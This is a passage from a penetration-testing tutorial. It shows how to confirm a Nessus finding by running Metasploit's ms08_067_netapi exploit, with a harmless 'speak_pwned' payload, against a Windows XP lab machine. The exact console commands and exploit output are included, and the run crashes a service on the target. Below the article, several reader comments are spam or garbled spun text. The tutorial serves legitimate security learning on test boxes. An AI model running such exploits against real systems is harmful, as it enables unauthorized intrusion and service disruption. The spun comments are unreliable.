A Penetration Tester's Toolkit

Take a look at the report in detail by clicking on the IP in the report. Here you will see a grid broken down by level of concern. As you can see, this very basic vulnerability scan returned a lot of good information. In particular, let's look at the RPC issue. Open that up and take a look at the listing (Figure 7).

Figure 7. A Lot Going on Here for a Fresh Build

What you can take away from this is that RPC is a service of concern and that Nessus by itself has an exploit against it. The plugin ID tells you which plugin to use to test the exploit; the name gives you some detail about the issue, and port and severity are self-explanatory. By clicking on the name, you pull up a window that provides plenty of detail, including what versions are affected, patches released to fix it and various other tidbits (Figure 8).

Figure 8. Detailed Results

This gives us plenty to work with, but let's make sure that we really can exploit this and that there is, indeed, cause for concern. You could do that with Nessus (give it a try!), but rather than relying solely on Nessus, let's bring in the final tool, the heavy-hitter Metasploit.

Why use two different tools that can do the same job? Preference, mostly. I find that Metasploit is much better suited for exploits than Nessus. That's not to say Nessus doesn't get the job done, but Metasploit was built specifically for this purpose. If nothing else, a third tool presents another compelling piece of evidence to support your findings. It never hurts to have an extra set of eyes.

Before going any further, I should say this: I have a ton of respect for the power behind Metasploit. Be sure to read all the documentation before ever attempting a run of Metasploit against a remotely used box. Metasploit is a lot of fun, but kind of in the way that fireworks are a lot of fun (obviously, accidents can happen if you're not careful).

Start by opening a terminal, su to root (if you have given a regular user access to the proper files/directories for Metasploit, it's best to run as said user instead of root), and run the command msfconsole (Figure 9).

Figure 9. Behold, Metasploit

Once you get a prompt back, the first thing to do is select your exploit to test. To see all available exploits, type the following, then go get a cup of coffee, because this takes a minute...or two:


show exploits

Okay, for the purpose of this example, let's use the following command (Figure 10 shows the results), which corresponds to the previous error shown from Nessus (Figure 8):


use exploit/windows/smb/ms08_067_netapi

Figure 10. Exploits Listed and Exploit Selected

You could use another exploit, which simply would crash the box, but let's try not to be too destructive. With your exploit selected, now you need to choose a payload. A payload is the set of instructions to send via the exploit to get the desired results. In this case, you want to broadcast a message to the computer. First, list your payloads by running the following:


show payloads

Next, select the payload by using the following command:


set payload windows/speak_pwned 

Figure 11. Payload Selected

Finally, show the options for this payload to see what you need to append to this command to run the exploit. In this case, you need to give it the IP of the box in question (which makes sense—Metasploit is not a mind-reading tool). Listing 2 shows the output.

Listing 2. Output of Exploit


msf  exploit(ms08_067_netapi) > set payload windows/speak_pwned 
payload => windows/speak_pwned
msf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       Pipe name to use (BROWSER, SRVSVC)


Payload options (windows/speak_pwned):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf  exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf  exploit(ms08_067_netapi) > exploit

[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
msf  exploit(ms08_067_netapi) > 

As you can see, the exploit completed. And, if you have sound on your virtual machine, you will have heard something to the effect of "pwnd". If you take a look at the Windows machine, you will see that a service crashed in this exploit—a rather typical side effect (Figure 12).

Figure 12. We broke the box.

You could try a few other exploits (actually quite a few), but this gives you a good idea of how something simple like sending an audible could cause an issue. Again, be careful, and always play on a test box.

Conclusion

As you can see, these three tools, when used together, make for a powerful investigation and the basis for a good report. Used wisely, these tools can help defend your network against these very exploits. I often find myself simply using Nmap to do random scans on my subnet for new computers, Nessus to investigate further and find vulnerabilities, and Metasploit to disable the device if necessary (it happens more than you think). I also use these tools for generating reports, giving presentations to management and keeping my network healthy in general. I learn something new every time I run them, either about the tools themselves or my network, thus keeping it interesting. Give the tools a try and see what you think and enjoy!

Resources

Nmap: http://nmap.org

Metasploit: http://metasploit.com

Nessus: http://www.nessus.org

______________________

Matthew Agle is a 30-year-old senior architect. When he's not focusing on work, hacking, security, his blog or various other hobbies, he can be found playing with his kids and generally annoying his wife.

Comments

Comment viewing options

Select your preferred way to display the comments and click "Save settings" to activate your changes.

Great post .Thank you for

Temizlik firmaları's picture

Great post .Thank you for this article.
I'm not really into networking, so being able to use such tools is very convenient to me... Temizlik şirketleri

The botheration I see is that

Tyrwhittse's picture

The botheration I see is that Microsoft bankrupt their own disciplinarian archetypal and a lot of humans are XP users still because they can't allow to bandy out all or a lot auto diagnostics of of their hardware. These humans don't apperceive about or accept alone Linux, conceivably because their in abode software will not plan beneath WINE. There is ReactOS, but ReactOS is not abiding and it is not adapted for day to day use yet.

Very cool article. I have

bourne's picture

Very cool article. I have used all these tools (been a while since I used nessus though). Metasploit is awesome, but can be a little overwhelming to use. Nmap is amazing though and has a lot of great features and can be used for a bunch of different things. Great article thank you!

Nmap is a great tool for this

UK VPS's picture

Nmap is a great tool for this type of work. Have you had a look at OpenVAS?
I think an article on OpenVAS would be a good follow up.

Thanx

CuisineThai's picture

Thank you for this article. A must read !
I'm not really into networking, so being able to use such tools is very convenient to me :)

Good Article. Should get

Anonymous's picture

Good Article. Should get people interested enough to try these tools out.

As for ease of use metasploit also has a good frontend: Armitage.

Progress in engineering

Tyrwhittse's picture

Progress in engineering haven't left the car industry guiding. Do-it-yourself devices can be a issue of your earlier. You could no extra get less than the hood of auto diagnostics the auto to remove elements and put them jointly with out stressing in regards to the car's doing work. Now, fuel techniques, ignition timing, temperature sensors, and so on. are managed and supervised by way of sophisticated pc systems.

Your missing The

Anonymous's picture

Your missing The Social-Engineer Toolkit -- One of the best ones out there as well. Good article!

Cool

RonDavidson's picture

This is really highly interesting, I tested this on the hosting account used for my website here and I must say the results were more than surprising. You pointed out a few details I never really cared about much. Really simple if you know the problem, which makes being aware even more important. To sum it up: Thanks :)

White Paper
Linux Management with Red Hat Satellite: Measuring Business Impact and ROI

Linux has become a key foundation for supporting today's rapidly growing IT environments. Linux is being used to deploy business applications and databases, trading on its reputation as a low-cost operating environment. For many IT organizations, Linux is a mainstay for deploying Web servers and has evolved from handling basic file, print, and utility workloads to running mission-critical applications and databases, physically, virtually, and in the cloud. As Linux grows in importance in terms of value to the business, managing Linux environments to high standards of service quality — availability, security, and performance — becomes an essential requirement for business success.

Learn More

Sponsored by Red Hat

White Paper
Private PaaS for the Agile Enterprise

If you already use virtualized infrastructure, you are well on your way to leveraging the power of the cloud. Virtualization offers the promise of limitless resources, but how do you manage that scalability when your DevOps team doesn’t scale? In today’s hypercompetitive markets, fast results can make a difference between leading the pack vs. obsolescence. Organizations need more benefits from cloud computing than just raw resources. They need agility, flexibility, convenience, ROI, and control.

Stackato private Platform-as-a-Service technology from ActiveState extends your private cloud infrastructure by creating a private PaaS to provide on-demand availability, flexibility, control, and ultimately, faster time-to-market for your enterprise.

Learn More

Sponsored by ActiveState